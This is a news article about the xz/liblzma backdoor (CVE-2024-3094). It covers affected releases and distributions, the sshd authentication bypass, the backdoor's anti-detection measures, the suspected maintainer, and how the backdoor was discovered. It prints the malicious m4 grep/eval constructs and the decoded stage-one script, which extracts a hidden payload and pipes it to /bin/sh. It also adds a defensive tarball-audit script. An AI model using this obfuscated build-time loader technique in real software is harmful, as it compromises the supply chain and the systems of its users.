Backdoor discovered in the xz/liblzma library that allows login via sshd

A backdoor (CVE-2024-3094) has been identified in the XZ Utils package, which includes the liblzma library and utilities for working with compressed data in the ".xz" format. The backdoor allows interception and modification of data processed by applications linked with the liblzma library. Its main target is the OpenSSH server, which in some distributions is linked with the libsystemd library, which in turn uses liblzma. Linking sshd with the vulnerable library gives attackers access to the SSH server without authentication.

The backdoor was present in the official releases 5.6.0 and 5.6.1, published on February 24 and March 9, which made their way into some distributions and repositories, for example Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide and 40-beta, openSUSE factory and tumbleweed, LibreELEC, Alpine edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current, Manjaro testing. All users of xz 5.6.0 and 5.6.1 are advised to roll back urgently to version 5.4.6.

Among the factors that mitigate the problem, the version of liblzma with the backdoor did not become part of the stable releases of the major distributions, but it did affect openSUSE Tumbleweed and Fedora 40-beta. Arch Linux and Gentoo used a vulnerable version of xz, but they are not susceptible to the attack because they do not apply the systemd-notify patch to openssh, which is what causes sshd to be linked with liblzma. The backdoor affects x86_64 systems based on the Linux kernel and the Glibc C library.

The backdoor activation code was hidden in m4 macros from the build-to-host.m4 file used by the build toolkit during the build. During the build, a series of convoluted, obfuscated operations based on archives (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma) that are used to test correct operation produced an object file with malicious code, which was included in the liblzma library and changed the logic of some of its functions. The m4 macros that activate the backdoor were included in the release tarballs, but were not present in the Git repository. At the same time, the malicious test archives were present in the repository, i.e. whoever implemented the backdoor had access to both the repository and the release generation process.

When liblzma is used in applications, the malicious changes could be used to intercept or modify data, or to affect the operation of sshd. In particular, the malicious code replaced the RSA_public_decrypt function to bypass the sshd authentication process. The backdoor included protection against detection: it did not manifest itself when the LANG and TERM environment variables were set (i.e. when the process was started in a terminal) and the LD_DEBUG and LD_PROFILE environment variables were not set, and it was activated only when the /usr/sbin/sshd executable was being run. The backdoor also had a means of detecting execution in debugging environments.

In particular, the m4/build-to-host.m4 file used the following constructs:

    gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
    …
    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

In the first construct, the grep operation found the file tests/files/bad-3-corrupt_lzma2.xz, which, when unpacked, yielded the following script:

    ####Hello####
    #345U211267$^D330^W
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    eval `grep ^srcdir= config.status`
    if test -f ../../config.status;then
    eval `grep ^srcdir= ../../config.status`
    srcdir="../../$srcdir"
    fi
    export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
    ####World####
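An added example, not code from the xz project or from this article: a Python check built on two points made above, that the activating macro shipped only in the release tarballs and that the macro located its carrier file with a marker expression. It compares a release tarball with the repository checkout it should match and flags members containing that marker; the function names, the `pkg-0.0.0/` prefix and the sample files are constructed for illustration.

```python
import io
import re
import tarfile
import tempfile
from pathlib import Path

# The expression the modified build-to-host.m4 hands to `grep -aErls`, applied
# to raw bytes: four '#', five alphanumerics, four '#', end of line.
MARKER = re.compile(rb"#{4}[0-9A-Za-z]{5}#{4}$", re.MULTILINE)

def audit_release(tar_bytes: bytes, checkout: Path) -> dict:
    """Compare release-tarball members with the checkout they should match."""
    report = {"only_in_tarball": [], "differs": [], "marker": []}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        for member in tar:
            # Regular files only; skip traversal-style names.
            if not member.isfile() or ".." in Path(member.name).parts:
                continue
            data = tar.extractfile(member).read()  # read only, never extract
            rel = member.name.split("/", 1)[-1]    # drop the "pkg-x.y.z/" prefix
            local = checkout / rel
            if not local.is_file():
                report["only_in_tarball"].append(rel)
            elif local.read_bytes() != data:
                report["differs"].append(rel)
            if MARKER.search(data):
                report["marker"].append(rel)
    return {key: sorted(names) for key, names in report.items()}

def constructed_demo() -> dict:
    """Constructed sample: a checkout, and a tarball with one extra macro file."""
    repo = {"src/a.c": b"int main(void){return 0;}\n",
            "tests/files/sample.bin": b"\x00\x01####Hello####\n\x02\x03"}
    extra = {"m4/extra.m4": b"dnl shipped only in the tarball\n"}
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in repo.items():
            path = Path(tmp, name)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_bytes(data)
        buf = io.BytesIO()
        with tarfile.open(fileobj=buf, mode="w:gz") as tar:
            for name, data in {**repo, **extra}.items():
                info = tarfile.TarInfo("pkg-0.0.0/" + name)
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
        return audit_release(buf.getvalue(), Path(tmp))

if __name__ == "__main__":
    print(constructed_demo())
```

Release tarballs legitimately carry generated build files that are absent from Git, so `only_in_tarball` is a list of files to review rather than a verdict.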

How the attackers managed to gain access to the xz project's infrastructure has not yet been fully clarified. It is also not yet known how many users and projects have been compromised as a result of the backdoor. The alleged author of the backdoor (JiaT75 - Jia Tan), who placed the archives with malicious code in the repository, corresponded with Fedora developers and sent pull requests to Debian related to moving the distributions to the xz 5.6.0 branch, but did not arouse suspicion, having taken part in xz development for the past two years and being the second developer by number of changes made. In addition to the xz project, the alleged author of the backdoor also took part in the development of the xz-java and xz packages. Moreover, a few days ago Jia Tan was added to the maintainers of the XZ Embedded project used in the Linux kernel.

The malicious change was discovered after an analysis of excessive CPU consumption and of errors generated by valgrind when connecting via ssh to Debian-based systems. It is noteworthy that the xz 5.6.1 release included changes prepared by the alleged author of the backdoor in response to complaints about sshd slowdowns and crashes that arose after updating to xz version 5.6.0 with the backdoor. In addition, last year Jia Tan made changes that were incompatible with the "-fsanitize=address" check mode, which caused it to be disabled during fuzz testing.

Source: opennet.ru
